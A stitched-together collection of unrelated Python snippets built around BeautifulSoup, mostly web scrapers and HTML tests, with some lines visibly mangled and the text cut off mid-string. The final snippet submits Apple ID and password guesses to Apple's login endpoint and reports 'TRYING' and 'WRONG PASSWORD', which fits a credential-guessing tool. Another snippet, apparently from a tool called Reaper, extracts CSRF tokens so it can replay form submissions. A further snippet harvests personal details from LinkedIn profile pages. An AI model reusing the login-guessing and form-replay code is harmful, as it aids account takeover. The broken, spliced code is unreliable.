def Login(self, username=None, password=None): if self.username: username = self.username if self.password: password = self.password # request username if needed if username == None or len(username) < 3: username = str(input("username: "******"Password too long, must be less than 128 characters.") credentials = { "UserName": username, "Password": password, "AuthMethod": "FormsAuthentication" } # Get the URL with the csrf token self.prepare() # Make the login request ADFSResponse = self.s.post( self.adfs, data=credentials, headers={ "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8" }, allow_redirects=True) soup = Soup(ADFSResponse.text, "html.parser") # Check if an error occured error = soup.find("span", {"id": "errorText"}) if error: error = error.text if error: raise BaseException(str(error)) print("[+] Authenticated with domain controller SSO!") # Fetch redirect location for active directory SAML authentication ADController = soup.find("form", {"name": "hiddenform"}) if not ADController: raise BaseException( "An unknown error occured while authenticating with the controller." ) ADController = ADController['action'] if not ADController: raise BaseException( "An unknown error occured while authenticating with the controller: No engine in response." ) # Fetch SAML session SAMLResponse = soup.find("input", {"name": "SAMLResponse"}) if not SAMLResponse: raise BaseException( "An unknown error occured while authenticating with the controller: No SAML in response." ) SAMLResponse = SAMLResponse['value'] if not SAMLResponse: raise BaseException( "An unknown error occured while authenticating with the controller: No SAML in response." ) SAMLSession = {"SAMLResponse": SAMLResponse} # Finally log in at domain controller ADCTLResponse = self.s.post(ADController, data=SAMLSession, allow_redirects=True) # Check if authentication succeeded if ADCTLResponse.status_code != 200: raise BaseException("Authentication failure: " + responses[ADCTLResponse.status_code]) print("[+] Got SAML session, can now authenticate with application.") # Continue to brightspace controller soup = Soup(ADCTLResponse.text, "html.parser") # Get the processform DLOController = soup.find("form", {"id": "ProcessForm"}) if not DLOController: raise BaseException("Failed to retrieve DLO controller") # Retrieve the brightspace controller DLOController = DLOController['action'] if not DLOController: raise BaseException("Failed to retrieve DLO controller") # Fetch SAML session SAMLResponse = soup.find("input", {"name": "SAMLResponse"}) if not SAMLResponse: raise BaseException( "An unknown error occured while authenticating with the controller: No SAML in response." ) SAMLResponse = SAMLResponse['value'] if not SAMLResponse: raise BaseException( "An unknown error occured while authenticating with the controller: No SAML in response." ) SAMLSession = { "SAMLResponse": SAMLResponse, } # Authenticate with brightspace DLOCTLResponse = self.s.post(DLOController, data=SAMLSession, allow_redirects=True) if DLOCTLResponse.status_code != 200: print("Failed to login at brightspace, reason: %s" % responses[DLOCTLResponse.status_code]) print("Welcome to the Digital Learning Environment of HVA") print("-" * 25)
def test_definition_sql(path, expected_definition_sql, app_client): response = app_client.get(path) pre = Soup(response.body, "html.parser").select_one("pre.wrapped-sql") assert expected_definition_sql == pre.string
def test_facet_display(app_client): response = app_client.get( "/fixtures/facetable?_facet=planet_int&_facet=city_id&_facet=on_earth") assert response.status == 200 soup = Soup(response.body, "html.parser") divs = soup.find("div", {"class": "facet-results"}).findAll("div") actual = [] for div in divs: actual.append({ "name": div.find("strong").text, "items": [{ "name": a.text, "qs": a["href"].split("?")[-1], "count": int(str(a.parent).split("</a>")[1].split("<")[0]), } for a in div.find("ul").findAll("a")], }) assert [ { "name": "city_id", "items": [ { "name": "San Francisco", "qs": "_facet=planet_int&_facet=city_id&_facet=on_earth&city_id=1", "count": 6, }, { "name": "Los Angeles", "qs": "_facet=planet_int&_facet=city_id&_facet=on_earth&city_id=2", "count": 4, }, { "name": "Detroit", "qs": "_facet=planet_int&_facet=city_id&_facet=on_earth&city_id=3", "count": 4, }, { "name": "Memnonia", "qs": "_facet=planet_int&_facet=city_id&_facet=on_earth&city_id=4", "count": 1, }, ], }, { "name": "planet_int", "items": [ { "name": "1", "qs": "_facet=planet_int&_facet=city_id&_facet=on_earth&planet_int=1", "count": 14, }, { "name": "2", "qs": "_facet=planet_int&_facet=city_id&_facet=on_earth&planet_int=2", "count": 1, }, ], }, { "name": "on_earth", "items": [ { "name": "1", "qs": "_facet=planet_int&_facet=city_id&_facet=on_earth&on_earth=1", "count": 14, }, { "name": "0", "qs": "_facet=planet_int&_facet=city_id&_facet=on_earth&on_earth=0", "count": 1, }, ], }, ] == actual
import scraperwiki import urllib2 import re from bs4 import BeautifulSoup as Soup url = "http://nl.wikipedia.org/wiki/Lijst_van_huidige_burgemeesters_in_Nederland" #for num in range (0, 10): # baseplusnr = base_url+str(num) # url = baseplusnr # #print url soup = Soup(url) hl = soup.findAll("tr") #hlclean = hl.href.string print hl import scraperwiki import urllib2 import re from bs4 import BeautifulSoup as Soup url = "http://nl.wikipedia.org/wiki/Lijst_van_huidige_burgemeesters_in_Nederland" #for num in range (0, 10): # baseplusnr = base_url+str(num) # url = baseplusnr # #print url soup = Soup(url) hl = soup.findAll("tr") #hlclean = hl.href.string
def test_metadata_json_html(app_client): response = app_client.get("/-/metadata") assert response.status == 200 pre = Soup(response.body, "html.parser").find("pre") assert METADATA == json.loads(pre.text)
def query_13f(self): # narrow query paras to '13F-HR' type and return results query_13f = self.query + "&type=13F-HR&dateb=&owner=include&count=40" query_13f_resp = requests.get(query_13f) query_13f_soup = Soup(query_13f_resp.text, "html.parser") return query_13f_soup
driver = webdriver.Chrome(chrome_path) def go_to_about(sup_url): about = driver.get() about_html = about.read() about.close() about_soup = Soup(about_html, "html.parser") nav = about_soup.nav for url in nav.findAll("a"): #count = count+1 sub_url = url.get('href') tot_url = parse.urljoin(sup_url, sub_url) print(tot_url) my_url = 'https://dir.indiamart.com/impcat/peanutbutter-all.html' uClient = uReq(my_url) page_html = uClient.read() uClient.close() page_soup = Soup(page_html, "html.parser") containers = page_soup.findAll("div", {"class": "prr w100"}) for container in containers: main_link = container.a["href"] #mainn = Soup(main_link, "html.parser") go_to_about(main_link) #break #print(len(containers)) #print(main_link)
def parametersfunc(threadName, p, url, save, second_way, page): #set some variables parameters = {} #make the parameters a list parameters_list = p.split("/") #make parameters list a dictionary (needed from the requests module) for i in range(0,len(parameters_list)): para = parameters_list[i].split("=") parameters[para[0]] = para[1] #make a url get request to get the cookies and the csrf token req = requests.get(url) #extract the cookies cookie = req.cookies #extract the csrf token and add it to parameters #if the csrf token is embedded in the HTML: for key, value in parameters.items(): if value == "TOKEN": html = req.text soup = Soup(html, 'lxml') try: csrf_token = soup.find_all(attrs={ "name" : key })[0].get('value') except IndexError: return else: #replace TOKEN with the csrf_token parameters[key] = csrf_token #if the csrf token is in a script: for key, value in parameters.items(): if value == "SCRIPT": html = req.text csrf_token = "" try: #search the html text for the csrf_token re.search(key + ".*?value.*?=.*?\w.*?;", html) except IndexError: return else: #find all accounts of csrf_token in the html text (there might be more than one if #the site has included more as comments) csrf_token1 = re.findall(key + ".*?value.*?=.*?\w.*?;", html) #if there are comments to fool Reaper if len(csrf_token1) > 1: #make a second get request req = requests.get(url) #extract the cookies again cause they change with each request cookie = req.cookies html = req.text #find all the accounts of csrf_token in the html text again csrf_token2 = re.findall(key + ".*?value.*?=.*?\w.*?;", html) #cross-check the results and remove those which are the same for i in csrf_token1: for j in csrf_token2: if i == j: csrf_token1.remove(i) #token should be a list with 2 items (the csrf_token is included in the 2nd item) token = str(csrf_token1).split("=") try: token[1] except IndexError: return else: #get only the alphanumeric characters from the token for i in token[1]: if i.isalnum(): csrf_token += i #replace TOKEN with the csrf_token parameters[key] = csrf_token request(url, cookie, parameters, page, second_way, save)
from utilities import is_number from utilities import download_master_file from utilities import save_error_file conn = MongoClient() collection = conn["labbioinfo"]["IBD"] folders = create_dir('PRJNA389280.txt', 'IBD') download_master_file('https://ibdmdb.org/tunnel/products/HMP2/Metadata/hmp2_metadata.csv', folders[4]) metadata_set = read_master_file(folders[4], ',') for filename in os.listdir(folders[3]): fullname = os.path.join(folders[3], filename) infile = open(fullname,"r") contents = infile.read() soup = Soup(contents,'xml') sample_ID = soup.find('SUBMITTER_ID') if sample_ID is not None: sampleid = sample_ID.get_text() sample_set = metadata_set.loc[metadata_set['Project'] == sampleid] sample_set = sample_set.to_dict('index') key_loc = list(sample_set.keys()) sampledict = sample_set[key_loc[0]] primary_ID = soup.find('PRIMARY_ID') taxon_ID = soup.find('TAXON_ID') science_name = soup.find('SCIENTIFIC_NAME') tags = soup.findAll('TAG') values = soup.findAll('VALUE') infile.close() tags = [i.get_text() for i in tags] loc1 = tags.index("geo_loc_name")
def parsePage(self): self.Soup = Soup(self.page_html, "html.parser")
def test_add_state_route_get_has_select_list(self, get_data): """.""" response = self.client.get(reverse_lazy("add_state")) html = Soup(response.content, "html5lib") self.assertEqual(len(html.find_all("option")), len(STATES) - 1)
def foo(ID,URL): try: opener = urllib2.build_opener() opener.addheaders = [('User-agent', 'Mozilla/5.0')] url = URL response = opener.open(url) page = response.read() #from bs4 import BeautifulSoup soup = Soup(page) #print soup #Head = soup.find('head') """Id = (Head.find('link'))#.encode('utf8', 'ignore').strip() id=(Id.get('href')).strip().split('/')[4] id=str(id)""" id=ID #print id Data=soup.findAll('td',{'class' :'fdata'}) name=Data[0].text #print name Website_link=Data[1].find('a') website_link=(Website_link.get('href')).strip() #print website_link category=Data[2].text #print category active=Data[3].text #print active founders=Data[4].text #print founders current_director=Data[5].text #print current_director try: Board_of_directors_link=Data[6].find('a') board_of_directors_link=(Board_of_directors_link.get('href')).encode('utf8', 'ignore').strip() #print board_of_directors_link except Exception,e: print "Board of directorerror"+str(e) politicalaffiliation=Data[7].text #print politicalaffiliation research=Data[8].text #print research mission=Data[9].text #print mission non_profit=Data[10].text #print non_profit funding=Data[11].text #print funding address=Data[25].text #print address phonenumber=Data[27].text #print phonenumber posturl=soup.find('div',{'class' :'content'}) post_url=posturl.find('form') pourl=(post_url.get('action')).strip()
# Constant for setting wallpaper by day of month DAY_OF_MONTH = date.today().day # Constant for creating and storing images STORE_DIRECTORY = os.path.join( os.path.expanduser('~'), 'Pictures/Wallpapers/Hubble Space Advent Calendar 2018') # Constant for matching filepaths/filenames on CDN VALID_IMAGE = re.compile(r'.*/a\d{1,2}.*') # Make the required directories os.makedirs(STORE_DIRECTORY, exist_ok=True) # Fetch the page for parsing page = Soup(urllib.request.urlopen(CALENDAR_URL), 'html.parser') # Find the containers images = page.findAll('li', id=re.compile('img(\d{1,2})')) # Create an empty dictionary to store the valid image URLs valid_images = {} # Find the valid image URLs for image in images: image_url = image.find('source', attrs={ 'data-srcset': re.compile('main_1500') }).get('data-srcset') if VALID_IMAGE.match(image_url): valid_images[len(valid_images) + 1] = image_url
def parse_html(page_html): """Html parsing""" return Soup(page_html, "html.parser")
from bs4 import BeautifulSoup as Soup import requests import re page = requests.get( 'https://www.goodreads.com/book/show/23165017-separate-and-dominate?from_search=true', headers={'User-Agent': 'test'}) page = page.text soup = Soup(page, 'html.parser') #soup = soup.prettify() soup = soup.find_all('span') #print(soup) for i in soup: print(i) if i.find(id): print(i.get_text()) print('--------------------------------------------\n') #print(text) ''' x = i.get('id') if x == None: continue #print(x) text = i.find(id) print(text) #print(text.get_text()) '''
def get_news(self, deamplify=False): self.url = 'https://news.google.com/' try: self.req = urllib.request.Request(self.url, headers=self.headers) self.response = urllib.request.urlopen(self.req) self.page = self.response.read() self.content = Soup(self.page, "html.parser") self.content = self.content.find("h2").parent.parent.parent result = self.content.findChildren("div", recursive=False) section = None for item in result: try: try: section = item.find("h2").find("a").text except Exception as sec_e: pass title = item.find("h3").text if deamplify: try: link = item.find("article").get("jslog").split( '2:')[1].split(';')[0] except Exception as deamp_e: print(deamp_e) link = 'news.google.com/' + item.find("h3").find( "a").get("href") else: link = item.find("h3").find("a").get("href") self.texts.append(title) self.links.append(link) try: datetime = item.find("time").get("datetime") except: datetime = None try: time = item.find("time").text except: time = None try: site = item.find("time").parent.find("a").text except: site = None try: img = item.find("img").get("src") except: img = None desc = None if link.startswith('https://www.youtube.com/watch?v='): desc = 'video' self.results.append({ 'section': section, 'title': title, 'datetime': datetime, 'time': time, 'site': site, 'desc': desc, 'link': link, 'media': None, 'img': img }) except Exception as big_e: pass self.response.close() except Exception as e: print(e) pass
def fetch_query(self, query): resp = requests.get(query) soup = Soup(resp.text, "html.parser") return soup
import sys import urllib from bs4 import BeautifulSoup as Soup BRAND = "nexus" if __name__ == "__main__": if len(sys.argv) < 3: sys.exit("Usage: %s <html-file> <download-path>" % sys.argv[0]) fn = sys.argv[1] dn = sys.argv[2] with open(fn, "r") as f: soup = Soup(f, "html.parser") divs = soup.findAll("div", {"class": "devsite-table-wrapper"}) for div in divs: trs = div.find("tbody").findAll("tr") for tr in trs: td = tr.findAll("td")[0] vern = td.text.split(" ")[0] a = tr.find("a") link = a["href"] tokens = link.split("/")[-1].split("-") model = tokens[0] build = tokens[1] name = "%s-%s-%s-%s" % (BRAND, model, build, vern)
]) # ----------- copy images over: print(destImagesPath) if os.path.exists(sourceImagesPath): copytree(sourceImagesPath, destImagesPath) chapterDict = {} chapterDict['path'] = chapter chapterDict['href'] = chapter + ".html" # ----------- now let's alter the HTML that's produced: if os.path.exists(destChapterPath): soup = Soup(open(destChapterPath, "rb").read(), "html.parser") # --- grab the title from h1 h1s = soup.find_all("h1") if (len(h1s) > 0): chapterDict['title'] = h1s[0].getText() else: chapterDict['title'] = "needs h1" chapterDict['chapterListName'] = chapter chapterDict['sections'] = [] chapterDict['destChapterPath'] = destChapterPath # --- Grab all the h2 (we call them sections) h2s = soup.find_all("h2")
def get_news(self, key="",deamplify=False): if key != '': key = "+".join(key.split(" ")) self.url = 'https://news.google.com/search?q={}+when:{}&hl={}'.format(key,self.__period,self.__lang.lower()) else: self.url = 'https://news.google.com/?hl={}'.format(self.__lang) try: self.req = urllib.request.Request(self.url, headers=self.headers) self.response = urllib.request.urlopen(self.req) self.page = self.response.read() self.content = Soup(self.page, "html.parser") articles = self.content.select('div[class="NiLAwe y6IFtc R7GTQ keNKEd j7vNaf nID9nc"]') for article in articles: try: # title try: title=article.find('h3').text except: title=None # description try: desc=article.find('span').text except: desc=None # date try: date = article.find("time").text # date,datetime_tmp = lexial_date_parser(date) except: date = None # datetime try: datetime_chars=article.find('time').get('datetime') datetime_obj = parse(datetime_chars).replace(tzinfo=None) except: datetime_obj=None # link if deamplify: try: link = 'news.google.com/' + article.find("h3").find("a").get("href") except Exception as deamp_e: print(deamp_e) link = article.find("article").get("jslog").split('2:')[1].split(';')[0] else: link = 'news.google.com/' + article.find("h3").find("a").get("href") self.__texts.append(title) self.__links.append(link) if link.startswith('https://www.youtube.com/watch?v='): desc = 'video' # image try: img = article.find("img").get("src") except: img = None # site try: site=article.find("time").parent.find("a").text except: site=None # collection self.__results.append({'title':title, 'desc':desc, 'date':date, 'datetime':datetime_obj, 'link':link, 'img':img, 'media':None, 'site':site}) except Exception as e_article: print(e_article) self.response.close() except Exception as e_parser: print(e_parser) pass
def read_static(params): from bs4 import BeautifulSoup as Soup from time import time import MySQLdb import requests import json import re import os #import excelHelper #import dbHandler import time #import CreateCSV import multiprocessing from multiprocessing import Pool import random import urllib import csv import traceback #import dbHandler from selenium import webdriver import glob #7137737 #list_of_files = glob.glob("C:\\Users\\Acer\\Desktop\\code\\linkedin code\\2.Crawler\\Dump\\10000-153324087.html") list_of_files = glob.glob( "C:\\Users\\Acer\\Desktop\\code\\linkedin code\\2.Crawler\\dump\\dump2\\*.html" ) #C:\Users\Acer\Desktop\code\linkedinproject\crawler\next1000 ##print list_of_files process_name = params[2] start_index = params[0] end_index = params[1] effective_list = list_of_files[int(start_index):int(end_index)] file_counter = 0 for files in effective_list: try: file_counter += 1 ##print 'Process No.:'+ process_name+' -parsing file no:' + str(file_counter)+":" #file_r=open("103-174319117.html").read() #soup = Soup(file_r, 'html.parser') # #print soup filename = open(files, 'rb') #print "filename ",filename #linkedin_id = ''.join(files.split('y\\')[5].split('.')[:-1]) employer_of = "n/a" ##print linkedin_id f = files #lid = f[f.find('y\\')+2:f.find('.html')] ccid = f[f.find('ump2\\') + 5:f.find('-')] lid = f[f.find('-') + 1:f.find('.html')] #print ccid #lid = f[:f.find('.html')] print ccid, "-", lid html_content = filename.read() ##print filename.close() soup = Soup(html_content, 'html.parser') #print soup #print "soup done" current_position_date = "N/A" # General Details try: print "General" #main_div = soup.find("div",{"id":"body"}).find("div",{"id":"profile"}) #top_card = main_div.find("div",{"id":"top-card"}).find("div",{"class":"profile-top-card"}).find("div",{"class":"profile-card"}).find("div",{"class":"profile-overview"}).find("div",{"class":"profile-overview-content"}).find("div",{"class":"masthead"}).find("div",{"data-li-template":"p2_basic_info"}).find("div",{"id":"name_container"}) ##print main_div.text #top_card = main_div.find("span",{"class":"full-name"}) ##print top_card.text gen_det = [] gen_det.append(ccid) gen_det.append(lid) try: employee_name = soup.findAll( 'span', {'class': 'full-name'})[0].text.encode( 'utf-8', 'replace') # [0].text.encode('utf-8','replace') print employee_name #et=soup.findAll('span',{'class':'full-name'}) #print "ename ",employee_name except Exception, e: print traceback.format_exc() employee_name = 'NA' #continue print employee_name gen_det.append(employee_name) try: current_title = soup.find("div", { "id": "headline" }).find("p", { "class": "title" }).text.encode('utf-8', 'replace') try: current_position = current_title.split( ' at ')[0].encode('utf-8', 'replace') except: current_position = 'NA' #print "current_position",current_position try: current_company = current_title.split( ' at ')[1].encode('utf-8', 'replace') except: current_company = 'NA' #print "current_company : ",current_company except: current_title = "NA" #print "title",current_title gen_det.append(current_title) # Location Details all_loc_div = soup.findAll('div', {'id': 'demographics'}) #all_exp_div = soup.find('div',{'id':'experience-482311328'}) #print 'Location',len(all_loc_div) i = 0 for div in all_loc_div: i += 1 #print "#",i loc = [] #final_div = div.find('div',{'id':re.compile('experience-*')}) final_div = div try: loc_div = final_div.findAll('span', {'class': 'locality'}) ##print len(loc_div) loc_name = loc_div[0].findAll('a') ##print major_name[1].text if len(loc_name) > 1: loc_name1 = loc_name[0].text loc_name2 = loc_name[1].text location_name = loc_name1 + " ," + loc_name2 else: loc_name1 = loc_name[0].text location_name = loc_name1 #field_name2 = field_div[1].find('a').text.encode('utf-8','replace') ##print field_name2 except Exception, e: #print str(e) location_name = "N/A" ##print "Location ",location_name loc.append(location_name) try: ind_div = final_div.findAll('dd', {'class': 'industry'}) ind = [] ##print len(ind_div) ind_name = ind_div[0].findAll('a') ##print major_name[1].text if len(ind_name) > 1: ind_name1 = ind_name[0].text loc_name2 = ind_name[1].text industry_name = ind_name1 + " ," + ind_name2 else: ind_name1 = ind_name[0].text industry_name = ind_name1 #field_name2 = field_div[1].find('a').text.encode('utf-8','replace') ##print field_name2 except Exception, e: #print str(e) industry_name = "N/A" #print "Industry ",industry_name ind.append(industry_name) gen_det.append(location_name) gen_det.append(industry_name) #print gen_det #current prvious edu curr_div = soup.find( 'tr', {'id': re.compile('overview-summary-current')}) curr = [] if curr_div is not None: stri_c = "" final_div = curr_div.findAll('a') for k in final_div: try: c = k.text except: c = NA p = c.find('Edit ') if p != -1: pass else: #stri=""+c curr.append(c) else: stri_c = "" curr.append("NA") curr.append("NA") for i in range(1, len(curr)): if i == len(curr) - 1: stri_c += curr[i] else: stri_c += curr[i] + "," gen_det.append(stri_c) #print prev_div = soup.find( 'tr', {'id': re.compile('overview-summary-past')}) prev = [] if prev_div is not None: stri_p = "" final_div = prev_div.findAll('a') for k in final_div: try: c = k.text except: c = NA p = c.find('Edit ') if p != -1: pass else: #stri=""+c prev.append(c) else: stri_p = "" prev.append("NA") prev.append("NA") #print prev for i in range(1, len(prev)): if i == len(prev) - 1: stri_p += prev[i] else: stri_p += prev[i] + "," gen_det.append(stri_p) #gen_det(stri) educa_div = soup.find( 'tr', {'id': re.compile('overview-summary-education')}) educa = [] if educa_div is not None: stri_e = "" final_div = educa_div.findAll('a') for k in final_div: try: c = k.text except: c = NA p = c.find('Edit ') if p != -1: pass else: #stri=""+c educa.append(c) else: stri_e = "" educa.append("NA") educa.append("NA") for i in range(1, len(educa)): if i == len(educa) - 1: stri_e += educa[i] else: stri_e += educa[i] + "," #educ=stri.encode('utf-8','replace') gen_det.append(stri_e) print gen_det dbHandler.addsgendata(gen_det) # ExperienceDetails all_exp_div = soup.findAll( 'div', {'id': re.compile('experience-.*-view')}) #all_exp_div = soup.find('div',{'id':'experience-482311328'}) #print 'experience',len(all_exp_div) i = 0 for div in all_exp_div: i += 1 #print "#",i pos = [] pos.append(ccid) pos.append(lid) #final_div = div.find('div',{'id':re.compile('experience-*')}) final_div = div try: title = final_div.find('h4').text.encode( 'utf-8', 'replace') ##print title except: title = "N/A" #print "title ",title pos.append(title) try: company_div = final_div.find('header').find_all('h5') if len(company_div) > 1: company_name = company_div[1].find( 'a').text.encode('utf-8', 'replace') else: company_name = company_div[0].find( 'a').text.encode('utf-8', 'replace') except Exception, e: #print str(e) company_name = "N/A" #print "company_name ",company_name pos.append(company_name) try: date_s = final_div.find( 'span', {'class': 'experience-date-locale'}) try: loc = date_s.find('span', { 'class': 'locality' }).text.encode('utf-8', 'replace') except: loc = "NA" try: date_span = date_s.text.encode('utf-8', 'replace') ds = date_span.decode('utf-8').split(u'\u2013') end = ds[1].replace(loc, "") except: ds = ["N/A"] end = "NA" except: loc = "NA" ds = ["N/A"] end = "NA" #print "date_span ",ds pos.append(ds[0]) pos.append(end) pos.append(loc)
dir = str(sys.argv[1]) enc = str(sys.argv[2]) mapping = defaultdict(str) os.system("cat dict.txt | grep i | grep _ | sed -n '/ /s/ */ /gp' > var.txt") os.system("sed 's/^[ \t]*//' var.txt > sol.txt") f = open("sol.txt", "r") for l in f: l = l.strip().split(' ') mapping[l[0]] = l[1] f.close() handle = open(dir + '/res' + enc + '.xml').read() soup = Soup(handle, 'xml') def hasNumbers(inputString): return any(char.isdigit() for char in inputString) variables = defaultdict(int) for var in soup.findAll('variable'): var_name = var["name"] var_value = round(float(var["value"])) variables[var_name] = var_value os.system( "cat tree.lst | grep 'VAR ' | grep -v objvar | cut -d ' ' -f 3- | sed -n '/ /s/ */ /gp' | cut -d ' ' -f 1,3 > solution.txt"
def test_canned_query_default_title(app_client): response = app_client.get("/fixtures/magic_parameters") assert response.status == 200 soup = Soup(response.body, "html.parser") assert "fixtures: magic_parameters" == soup.find("h1").text
import urllib import urllib2, sys from bs4 import BeautifulSoup as Soup import re # werkwijze: open een pagina, haal de inhoud op, geef aan welke data je wilt hebben, sla die op, ga naar de volgende pagina #samenstellen van de url die uit 3 elementen bestaat: vaste base_url, een oplopende id en een vaste uitgang base_url = "http://evenementen.uitslagen.nl/2013/marathonrotterdam/details.php?s=" end_url = "&o=1&t=nl" for num in range(1, 3): html = base_url + str(num) url = html + end_url #dit koppelt de drie elementen van de url aan elkaar soup = Soup(urllib.urlopen(url)) #open de pagina # onderstaand blokje is uit ammar: blok ruwe data/tags in één veld #for url in urls: #print "Scraping", url #page = scraperwiki.scrape(url) #if page is not None: #naam = re.findall("Naam(.*?)</table>", page, re.DOTALL) #data = {'Naam': naam} #scraperwiki.sqlite.save(['Naam'], data) # alle losse cellen in aparte velden, maar wel drie keer de tabel #table = soup.find("table") #for row in table.findAll("tr"): # for cell in row.findAll("td"): # print cell.findAll(text=True)
def test_zero_results(app_client, path): response = app_client.get(path) soup = Soup(response.text, "html.parser") assert 0 == len(soup.select("table")) assert 1 == len(soup.select("p.zero-results"))
def phase(config, session=False): url = "https://www.lectio.dk/lectio/%s/studieplan/forloeb_vis.aspx?phaseid=%s" % ( str(config["school_id"]), str(config["phase_id"])) if session is False: session = authenticate.authenticate(config) if session == False: return {"status": "error", "type": "authenticate"} cookies = { "lecmobile": "0", "ASP.NET_SessionId": session["ASP.NET_SessionId"], "LastLoginUserName": session["LastLoginUserName"], "lectiogsc": session["lectiogsc"], "LectioTicket": session["LectioTicket"] } # Insert User-agent headers and the cookie information headers = { "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1665.2 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded", "Host": "www.lectio.dk", "Origin": "https://www.lectio.dk", "Cookie": functions.implode(cookies, "{{index}}={{value}}", "; ") } response = proxy.session.get(url, headers=headers) html = response.text soup = Soup(html) if soup.find("div", attrs={"id": "m_Content_islandViewForløb_pa"}) is None: return {"status": False, "error": "Data not found"} headers = [] elements = [] for row in soup.find("div", attrs={ "id": "m_Content_islandViewForløb_pa" }).find("table").findAll("tr", recursive=False): headers.append(row.find("th", recursive=False)) elements.append(row.find("td", recursive=False)) rows = functions.mapRows(headers, elements) changeProg = re.compile( r"(?P<date>.*) af (?P<teacher>.*) \((?P<abbrevation>.*)\)") teamProg = re.compile(ur"(?P<term>.*): (?P<team>.*)") teams = [] periods = [] focusPoints = [] workMethods = [] activities = [] assignments = [] periodeProg = re.compile(r"(?P<start>.*) - (?P<end>.*)") activityProg = re.compile( r"\/lectio\/(?P<school_id>.*)\/aktivitet\/aktivitetinfo.aspx\?id=(?P<activity_id>.*)&prevurl=(?P<prev_url>.*)" ) if not rows["Aktiviteter"].find( attrs={"id": "m_Content_ActivitiesGV"}) is None: for row in rows["Aktiviteter"].find(attrs={ "id": "m_Content_ActivitiesGV" }).findAll("tr")[1:]: elements = row.findAll("td") activityGroups = activityProg.match(elements[1].find("a")["href"]) activities.append({ "activity_id": activityGroups.group("activity_id") if not activityGroups is None else "" }) if not rows["Skriftligtarbejde"].find( attrs={"id": "m_Content_ExercisesGrid"}) is None: for row in rows["Skriftligtarbejde"].find( attrs={ "id": "m_Content_ExercisesGrid" }).findAll("tr")[1:]: elements = row.findAll("td") assignments.append({ "name": unicode(elements[0].text), "date": datetime.strptime(elements[1].text.strip(), "%d-%m-%Y") }) for row in rows["Periode(r)"].text.strip().replace("\r\n", "").split("\n"): periodeGroups = periodeProg.match(row) periods.append({ "start": datetime.strptime( periodeGroups.group("start").strip(), "%d-%m-%Y") if not periodeGroups is None else "", "end": datetime.strptime(periodeGroups.group("end").strip(), "%d-%m-%Y") if not periodeGroups is None else "" }) for row in rows["Arbejdsformer"].findAll("span"): workMethods.append({"text": unicode(functions.cleanText(row.text))}) termProg = re.compile(r"(?P<value>.*)\/(?P<end>.*)") for row in rows["Hold"].findAll("span"): teamGroups = teamProg.match(row.text) termGroups = termProg.match( teamGroups.group("term") if not teamGroups is None else "") teams.append({ "context_card_id": row["lectiocontextcard"], "team_element_id": row["lectiocontextcard"].replace("HE", ""), "name": teamGroups.group("team") if not teamGroups is None else "", "term": { "years_string": teamGroups.group("term") if not teamGroups is None else "", "value": termGroups.group("value") if not termGroups is None else "" } }) if not rows["Saerligefokuspunkter"].find("ul") is None: focusRows = rows["Saerligefokuspunkter"].find("ul").findAll( "li", recursive=False) if len(focusRows) > 0: for row in focusRows: header = unicode(row.text) focusPointElements = [] if row.find_next().name == "ul": for focusElement in row.find_next().findAll("li"): focusPointElements.append( focusElement.text.encode("utf8")) focusPoints.append({ "header": header, "elements": focusPointElements }) changedGroups = changeProg.match(rows["Sidstaendret"].text.strip().replace( "\r\n", "").replace("\t", "")) createdGroups = changeProg.match(rows["Oprettet"].text.strip().replace( "\r\n", "").replace("\t", "")) estimate = rows["Estimat"].text.strip().replace("\r\n", "").replace( "\t", "").replace(" moduler", "").replace(",", ".") information = { "title": rows["Titel"].text.strip().replace("\r\n", "").replace("\t", "").encode("utf8"), "note": rows["Note"].text.strip().replace("\r\n", "").replace("\t", "").encode("utf8"), "estimate": { "type": "modules", "length": "none" if estimate == "ingen" else estimate }, "changed": { "date": datetime.strptime(changedGroups.group("date"), "%d/%m-%Y") if not changedGroups is None else "", "teacher": { "name": unicode(changedGroups.group("teacher")) if not changedGroups is None else "", "abbrevation": unicode(changedGroups.group("abbrevation")) if not changedGroups is None else "" } }, "teams": teams, "created": { "date": datetime.strptime(createdGroups.group("date"), "%d/%m-%Y") if not createdGroups is None else "", "teacher": { "name": unicode(createdGroups.group("teacher")) if not createdGroups is None else "", "abbrevation": unicode(createdGroups.group("abbrevation")) if not createdGroups is None else "" } }, "periods": periods, "focus_points": focusPoints, "methods": workMethods, "activities": activities, "assignments": assignments } return {"status": "ok", "phase": information}
def test_sort_links(app_client): response = app_client.get("/fixtures/sortable?_sort=sortable") assert response.status == 200 ths = Soup(response.body, "html.parser").findAll("th") attrs_and_link_attrs = [{ "attrs": th.attrs, "a_href": (th.find("a")["href"].split("/")[-1] if th.find("a") else None), } for th in ths] assert [ { "attrs": { "class": ["col-Link"], "scope": "col" }, "a_href": None }, { "attrs": { "class": ["col-pk1"], "scope": "col" }, "a_href": None }, { "attrs": { "class": ["col-pk2"], "scope": "col" }, "a_href": None }, { "attrs": { "class": ["col-content"], "scope": "col" }, "a_href": None }, { "attrs": { "class": ["col-sortable"], "scope": "col" }, "a_href": "sortable?_sort_desc=sortable", }, { "attrs": { "class": ["col-sortable_with_nulls"], "scope": "col" }, "a_href": "sortable?_sort=sortable_with_nulls", }, { "attrs": { "class": ["col-sortable_with_nulls_2"], "scope": "col" }, "a_href": "sortable?_sort=sortable_with_nulls_2", }, { "attrs": { "class": ["col-text"], "scope": "col" }, "a_href": "sortable?_sort=text", }, ] == attrs_and_link_attrs
def attempt(self, environ="PROD", appleid=None, password=None): # Retrieve the login page content loginpage = self.s.get(self.ids, allow_redirects=True) # If the status isn't HTTP_OK something must be wrong with the application if loginpage.status_code != 200: raise BaseException("Login page returned error") # Find the login soup = Soup(loginpage.text, "html.parser") form = soup.find("form", {"name": "form2"}) # Login form is named form2 # Automatically retrieve fields and set post data for requests formdata = dict() for element in form.find_all("input"): try: formdata[element["name"]] = element["value"] except Exception as exc: pass # Set the username and password if not appleid: appleid = str(input("APPLE ID: ")) if not password: password = str(input("PASSWORD: "******"appleId"] = appleid formdata["accountPassword"] = password # Apparently you can log into dev account formdata["ENV"] = environ # Authenticate with Apple print("[{}]: TRYING {}...".format(appleid, password)) authres = self.s.post( "https://idmsa.apple.com/IDMSWebAuth/authenticate", data=formdata, allow_redirects=True) # Check if login failed if "Your account information was entered incorrectly" in authres.text: print("WRONG PASSWORD") return 1 elif "Your Apple ID or password was entered incorrectly" in authres.text: print("ACCOUNT 